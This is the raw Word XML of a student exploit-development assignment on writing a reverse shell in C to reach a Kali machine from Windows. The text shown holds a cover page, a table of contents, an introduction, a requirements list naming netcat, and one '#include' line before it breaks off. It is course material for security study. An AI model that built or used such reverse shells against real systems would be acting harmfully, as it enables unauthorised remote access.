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416831407"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="222B9B86" w14:textId="79BD6B18" w:rsidR="00EB3351" w:rsidRDefault="00EB3351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1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3DDB6517" wp14:editId="6B75B918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7620" b="762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E68763" w14:textId="77777777" w:rsidR="00137690" w:rsidRDefault="00137690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3DDB6517" id="Rectangle 466" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:0;width:581.4pt;height:752.4pt;z-index:-25165414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" fillcolor="#d9e2f3 [660]" stroked="f" strokeweight="1pt">
                    <v:fill color2="#8eaadb [1940]" rotate="t" focus="100%" type="gradient">
                      <o:fill v:ext="view" type="gradientUnscaled"/>
                    </v:fill>
                    <v:textbox inset="21.6pt,,21.6pt">
                      <w:txbxContent>
                        <w:p w14:paraId="77E68763" w14:textId="77777777" w:rsidR="00137690" w:rsidRDefault="00137690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 wp14:anchorId="429C6782" wp14:editId="053BB07C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5915" cy="3017520"/>
                    <wp:effectExtent l="0" t="0" r="0" b="0"/>
                    <wp:wrapNone/>
                    <wp:docPr id="467" name="Rectangle 4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1E4D27B" w14:textId="5984BA78" w:rsidR="00137690" w:rsidRDefault="00EE4372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bstract"/>
                                    <w:id w:val="8276291"/>
                                    <w:showingPlcHdr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D1C8A">
                                      <w:rPr>
                                        <w:color w:val="FFFFFF" w:themeColor="background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429C6782" id="Rectangle 467" o:spid="_x0000_s1027" style="position:absolute;margin-left:0;margin-top:0;width:226.45pt;height:237.6pt;z-index:251656192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" fillcolor="#44546a [3215]" stroked="f" strokeweight="1pt">
                    <v:textbox inset="14.4pt,14.4pt,14.4pt,28.8pt">
                      <w:txbxContent>
                        <w:p w14:paraId="61E4D27B" w14:textId="5984BA78" w:rsidR="00137690" w:rsidRDefault="00EE4372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bstract"/>
                              <w:id w:val="8276291"/>
                              <w:showingPlcHdr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EndPr/>
                            <w:sdtContent>
                              <w:r w:rsidR="009D1C8A">
                                <w:rPr>
                                  <w:color w:val="FFFFFF" w:themeColor="background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4144" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5DEE38BF" wp14:editId="40EEC44B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18045EC0" id="Rectangle 468" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:0;width:244.8pt;height:554.4pt;z-index:25165414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" fillcolor="white [3212]" strokecolor="#747070 [1614]" strokeweight="1.25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A6719C3" wp14:editId="3053F6D4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368D4BCF" id="Rectangle 469" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:0;width:226.45pt;height:9.35pt;z-index:251660288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" fillcolor="#4472c4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030E435" wp14:editId="0EAF79C8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alias w:val="Title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4F4E3F0" w14:textId="2669F8B4" w:rsidR="00137690" w:rsidRDefault="00CB6132">
                                    <w:pPr>
                                      <w:spacing w:line="240" w:lineRule="auto"/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72C4" w:themeColor="accent1"/>
                                        <w:sz w:val="72"/>
                                        <w:szCs w:val="144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OHTS</w:t>
                                    </w:r>
                                    <w:r w:rsidR="00137690"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Exploit Development</w:t>
                                    </w:r>
                                    <w:r w:rsidR="00137690"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</w:rPr>
                                  <w:alias w:val="Subtitle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1D93B97" w14:textId="2AE9C572" w:rsidR="00137690" w:rsidRDefault="00636D65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32"/>
                                        <w:szCs w:val="32"/>
                                      </w:rPr>
                                      <w:t>C</w:t>
                                    </w:r>
                                    <w:r w:rsidR="00CB6132"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32"/>
                                        <w:szCs w:val="32"/>
                                      </w:rPr>
                                      <w:t>reating a reverse shell to access Kali through Window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type w14:anchorId="2030E4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0" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:220.3pt;height:194.9pt;z-index:251658240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4472C4" w:themeColor="accent1"/>
                              <w:sz w:val="72"/>
                              <w:szCs w:val="72"/>
                            </w:rPr>
                            <w:alias w:val="Title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14F4E3F0" w14:textId="2669F8B4" w:rsidR="00137690" w:rsidRDefault="00CB6132">
                              <w:pPr>
                                <w:spacing w:line="240" w:lineRule="auto"/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72C4" w:themeColor="accent1"/>
                                  <w:sz w:val="72"/>
                                  <w:szCs w:val="1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72C4" w:themeColor="accent1"/>
                                  <w:sz w:val="72"/>
                                  <w:szCs w:val="72"/>
                                </w:rPr>
                                <w:t>OHTS</w:t>
                              </w:r>
                              <w:r w:rsidR="00137690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72C4" w:themeColor="accent1"/>
                                  <w:sz w:val="72"/>
                                  <w:szCs w:val="72"/>
                                </w:rPr>
                                <w:t>Exploit Development</w:t>
                              </w:r>
                              <w:r w:rsidR="00137690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72C4" w:themeColor="accent1"/>
                                  <w:sz w:val="72"/>
                                  <w:szCs w:val="72"/>
                                </w:rPr>
                                <w:t>Assignment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44546A" w:themeColor="text2"/>
                              <w:sz w:val="32"/>
                              <w:szCs w:val="32"/>
                            </w:rPr>
                            <w:alias w:val="Subtitle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11D93B97" w14:textId="2AE9C572" w:rsidR="00137690" w:rsidRDefault="00636D65">
                              <w:pP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32"/>
                                  <w:szCs w:val="32"/>
                                </w:rPr>
                                <w:t>C</w:t>
                              </w:r>
                              <w:r w:rsidR="00CB6132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32"/>
                                  <w:szCs w:val="32"/>
                                </w:rPr>
                                <w:t>reating a reverse shell to access Kali through Window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796BD1DD" w14:textId="77777777" w:rsidR="00E67C7C" w:rsidRDefault="007E3E3C">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:color w:val="FFFFFF" w:themeColor="background1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7DFA1A13" wp14:editId="5A3F0938">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="page">
                      <wp:posOffset>3536315</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="page">
                      <wp:posOffset>6447790</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="2797810" cy="268605"/>
                    <wp:effectExtent l="0" t="0" r="0" b="0"/>
                    <wp:wrapSquare wrapText="bothSides"/>
                    <wp:docPr id="465" name="Text Box 46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05CB1D0A" w14:textId="77777777" w:rsidR="00C63BE2" w:rsidRDefault="00EE4372">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:rPr>
                                    <w:noProof/>
                                    <w:color w:val="44546A" w:themeColor="text2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color w:val="44546A" w:themeColor="text2"/>
                                    </w:rPr>
                                    <w:alias w:val="Auth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37690">
                                      <w:rPr>
                                        <w:noProof/>
                                        <w:color w:val="44546A" w:themeColor="text2"/>
                                      </w:rPr>
                                      <w:t>C</w:t>
                                    </w:r>
                                    <w:r w:rsidR="00C63BE2">
                                      <w:rPr>
                                        <w:noProof/>
                                        <w:color w:val="44546A" w:themeColor="text2"/>
                                      </w:rPr>
                                      <w:t>.N</w:t>
                                    </w:r>
                                    <w:r w:rsidR="00137690">
                                      <w:rPr>
                                        <w:noProof/>
                                        <w:color w:val="44546A" w:themeColor="text2"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve"> Samarasekara</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                                <w:r w:rsidR="00636D65">
                                  <w:rPr>
                                    <w:noProof/>
                                    <w:color w:val="44546A" w:themeColor="text2"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve">                    </w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="70A7FECA" w14:textId="245C58E5" w:rsidR="00137690" w:rsidRDefault="00636D65">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:rPr>
                                    <w:noProof/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noProof/>
                                    <w:color w:val="44546A" w:themeColor="text2"/>
                                  </w:rPr>
                                  <w:t>IT1712681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DFA1A13" id="Text Box 465" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:278.45pt;margin-top:507.7pt;width:220.3pt;height:21.15pt;z-index:251663360;visibility:visible;mso-wrap-style:square;mso-width-percent:36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36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" filled="f" stroked="f" strokeweight=".5pt">
                    <v:textbox style="mso-fit-shape-to-text:t">
                      <w:txbxContent>
                        <w:p w14:paraId="05CB1D0A" w14:textId="77777777" w:rsidR="00C63BE2" w:rsidRDefault="00EE4372">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:rPr>
                              <w:noProof/>
                              <w:color w:val="44546A" w:themeColor="text2"/>
                            </w:rPr>
                          </w:pPr>
                          <w:sdt>
                            <w:sdtPr>
                              <w:rPr>
                                <w:noProof/>
                                <w:color w:val="44546A" w:themeColor="text2"/>
                              </w:rPr>
                              <w:alias w:val="Auth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137690">
                                <w:rPr>
                                  <w:noProof/>
                                  <w:color w:val="44546A" w:themeColor="text2"/>
                                </w:rPr>
                                <w:t>C</w:t>
                              </w:r>
                              <w:r w:rsidR="00C63BE2">
                                <w:rPr>
                                  <w:noProof/>
                                  <w:color w:val="44546A" w:themeColor="text2"/>
                                </w:rPr>
                                <w:t>.N</w:t>
                              </w:r>
                              <w:r w:rsidR="00137690">
                                <w:rPr>
                                  <w:noProof/>
                                  <w:color w:val="44546A" w:themeColor="text2"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> Samarasekara</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                          <w:r w:rsidR="00636D65">
                            <w:rPr>
                              <w:noProof/>
                              <w:color w:val="44546A" w:themeColor="text2"/>
                            </w:rPr>
                            <w:t xml:space="preserve">                    </w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="70A7FECA" w14:textId="245C58E5" w:rsidR="00137690" w:rsidRDefault="00636D65">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:rPr>
                              <w:noProof/>
                              <w:color w:val="44546A" w:themeColor="text2"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:noProof/>
                              <w:color w:val="44546A" w:themeColor="text2"/>
                            </w:rPr>
                            <w:t>IT17126816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EB3351">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
            </w:rPr>
            <w:br w:type="page"/>
          </w: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</w:rPr>
            <w:id w:val="175767267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385F0E56" w14:textId="17ADE526" w:rsidR="00E67C7C" w:rsidRDefault="00E67C7C" w:rsidP="002B2C86">
              <w:pPr>
                <w:pStyle w:val="TOCHeading"/>
                <w:spacing w:line="360" w:lineRule="auto"/>
              </w:pPr>
              <w:r>
                <w:t>Contents</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="36BB6782" w14:textId="795E1664" w:rsidR="00EE4372" w:rsidRDefault="00E67C7C" w:rsidP="00EE4372">
              <w:pPr>
                <w:pStyle w:val="TOC1"/>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof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40218010" w:history="1">
                <w:r w:rsidR="00EE4372" w:rsidRPr="00B9486C">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Introduction</w:t>
                </w:r>
                <w:r w:rsidR="00EE4372">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00EE4372">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00EE4372">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc40218010 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00EE4372">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00EE4372">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00EE4372">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>2</w:t>
                </w:r>
                <w:r w:rsidR="00EE4372">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="4E7EAFBB" w14:textId="305A5D52" w:rsidR="00EE4372" w:rsidRDefault="00EE4372" w:rsidP="00EE4372">
              <w:pPr>
                <w:pStyle w:val="TOC1"/>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc40218011" w:history="1">
                <w:r w:rsidRPr="00B9486C">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Require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021801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D287A0A" w14:textId="14551886" w:rsidR="00EE4372" w:rsidRDefault="00EE4372" w:rsidP="00EE4372">
              <w:pPr>
                <w:pStyle w:val="TOC1"/>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc40218012" w:history="1">
                <w:r w:rsidRPr="00B9486C">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Coding using C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021801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4DEBB0F" w14:textId="10BA70CD" w:rsidR="00EE4372" w:rsidRDefault="00EE4372" w:rsidP="00EE4372">
              <w:pPr>
                <w:pStyle w:val="TOC2"/>
                <w:tabs>
                  <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
                </w:tabs>
                <w:spacing w:line="360" w:lineRule="auto"/>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc40218013" w:history="1">
                <w:r w:rsidRPr="00B9486C">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Import Header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021801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FBAF7CE" w14:textId="011F01C1" w:rsidR="00EE4372" w:rsidRDefault="00EE4372" w:rsidP="00EE4372">
              <w:pPr>
                <w:pStyle w:val="TOC2"/>
                <w:tabs>
                  <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
                </w:tabs>
                <w:spacing w:line="360" w:lineRule="auto"/>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc40218014" w:history="1">
                <w:r w:rsidRPr="00B9486C">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Main Function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021801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2C16D02" w14:textId="3B307B2B" w:rsidR="00EE4372" w:rsidRDefault="00EE4372" w:rsidP="00EE4372">
              <w:pPr>
                <w:pStyle w:val="TOC1"/>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc40218015" w:history="1">
                <w:r w:rsidRPr="00B9486C">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Compiling and running the Reverse Shell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021801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1B5C73E" w14:textId="417FB108" w:rsidR="00E67C7C" w:rsidRDefault="00E67C7C" w:rsidP="00EE4372">
              <w:pPr>
                <w:spacing w:line="36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3D7210FD" w14:textId="413DC2ED" w:rsidR="00EB3351" w:rsidRDefault="00EE4372">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2465BC31" w14:textId="5FD62325" w:rsidR="00A77DD8" w:rsidRDefault="00A77DD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350F196F" w14:textId="1F4F8CBF" w:rsidR="00A77DD8" w:rsidRDefault="00A77DD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D7318F" w14:textId="5F95214D" w:rsidR="00A77DD8" w:rsidRDefault="00A77DD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="772B6574" w14:textId="56E01537" w:rsidR="00A77DD8" w:rsidRDefault="00A77DD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D9AC568" w14:textId="65940C3B" w:rsidR="00A77DD8" w:rsidRDefault="00A77DD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA63189" w14:textId="31C74982" w:rsidR="00A77DD8" w:rsidRDefault="00A77DD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="455BDA11" w14:textId="6FC98FD8" w:rsidR="00A77DD8" w:rsidRDefault="00A77DD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22A05139" w14:textId="7B58C601" w:rsidR="00A77DD8" w:rsidRDefault="00A77DD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B10D73" w14:textId="7E5DBCA1" w:rsidR="00A77DD8" w:rsidRDefault="00A77DD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D1A741B" w14:textId="2AE52752" w:rsidR="00A77DD8" w:rsidRDefault="00A77DD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="342243D7" w14:textId="21915AC9" w:rsidR="00A77DD8" w:rsidRDefault="00A77DD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60549607" w14:textId="1E4BDF89" w:rsidR="00A77DD8" w:rsidRDefault="00A77DD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FCB43A3" w14:textId="13EEBF40" w:rsidR="00EE4372" w:rsidRDefault="00EE4372">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="492BB777" w14:textId="2D2A396E" w:rsidR="00EE4372" w:rsidRDefault="00EE4372">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47EA0BB3" w14:textId="77777777" w:rsidR="00EE4372" w:rsidRDefault="00EE4372">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00202202" w14:textId="6BC55987" w:rsidR="00A77DD8" w:rsidRDefault="00A77DD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D086FBB" w14:textId="17B31926" w:rsidR="00A77DD8" w:rsidRDefault="00A77DD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43B6D36A" w14:textId="57D9672B" w:rsidR="00A77DD8" w:rsidRDefault="00A77DD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="060D3DCA" w14:textId="70F03FF8" w:rsidR="00A77DD8" w:rsidRDefault="00A77DD8" w:rsidP="00A77DD8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc40218010"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4BD30547" w14:textId="72A5D1A6" w:rsidR="00A77DD8" w:rsidRDefault="00A77DD8" w:rsidP="00EB1612">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This document was prepared to act as a </w:t>
      </w:r>
      <w:r w:rsidR="005B2760">
        <w:t xml:space="preserve">brief </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">guide for the assignment which was prepared on behalf of the </w:t>
      </w:r>
      <w:r w:rsidR="003C7CB6">
        <w:t>Offensive Hacking Tactical and Strategic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E67C7C">
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>odule.</w:t>
      </w:r>
      <w:r w:rsidR="00E67C7C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A20EE2">
        <w:t xml:space="preserve">The requirement was to implement </w:t>
      </w:r>
      <w:r w:rsidR="006D5BB2">
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidR="00A20EE2">
        <w:t xml:space="preserve"> exploit development</w:t>
      </w:r>
      <w:r w:rsidR="00520083">
        <w:t xml:space="preserve"> which </w:t>
      </w:r>
      <w:r w:rsidR="00075093">
        <w:t>was fulfilled by implementing a reverse shell using C programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145AA8B6" w14:textId="75070809" w:rsidR="00EB1612" w:rsidRDefault="00EB1612" w:rsidP="00EB1612">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29CC2AC5" w14:textId="36E29A44" w:rsidR="00EB1612" w:rsidRDefault="009C1C5F" w:rsidP="00EB1612">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc40218011"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Requirements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="7393C5D3" w14:textId="749005CC" w:rsidR="00755FFF" w:rsidRDefault="009C1C5F" w:rsidP="00131C4F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Any Linux Distribution (Kali is used for this demonstration)</w:t>
      </w:r>
      <w:r w:rsidR="00AC7B6B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543B5F7D" w14:textId="1014ECB7" w:rsidR="004D4599" w:rsidRDefault="004D4599" w:rsidP="00131C4F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C </w:t>
      </w:r>
      <w:r w:rsidR="00520083">
        <w:t>compiler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if not present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686B230D" w14:textId="3377E35B" w:rsidR="00755FFF" w:rsidRDefault="009C1C5F" w:rsidP="00131C4F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NetCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> installed and runnable in windows command prompt</w:t>
      </w:r>
      <w:r w:rsidR="004D4599">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1959E7C3" w14:textId="291CE52E" w:rsidR="009411D4" w:rsidRDefault="009411D4" w:rsidP="00131C4F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5490D82C" w14:textId="267697FE" w:rsidR="009411D4" w:rsidRDefault="009411D4" w:rsidP="009411D4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc40218012"/>
      <w:r>
        <w:t>Cod</w:t>
      </w:r>
      <w:r w:rsidR="009D1335">
        <w:t>ing using C</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="306B7030" w14:textId="75D16049" w:rsidR="009411D4" w:rsidRDefault="009411D4" w:rsidP="00075093">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use an editor to write the C code in my case I have used GNU nano. </w:t>
      </w:r>
      <w:r w:rsidR="00AB26EA">
        <w:t>Other default editors can also be used such as the vi editor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A10406" w14:textId="39242EA0" w:rsidR="009411D4" w:rsidRDefault="009411D4" w:rsidP="009411D4"/>
    <w:p w14:paraId="3C1D7ECD" w14:textId="24335D9B" w:rsidR="009411D4" w:rsidRDefault="009411D4" w:rsidP="009411D4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc40218013"/>
      <w:r>
        <w:t>Import Headers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="20EF0D09" w14:textId="77777777" w:rsidR="009411D4" w:rsidRPr="009411D4" w:rsidRDefault="009411D4" w:rsidP="00534FD2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD3E0CC" w14:textId="77777777" w:rsidR="009411D4" w:rsidRPr="009411D4" w:rsidRDefault="009411D4" w:rsidP="00534FD2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
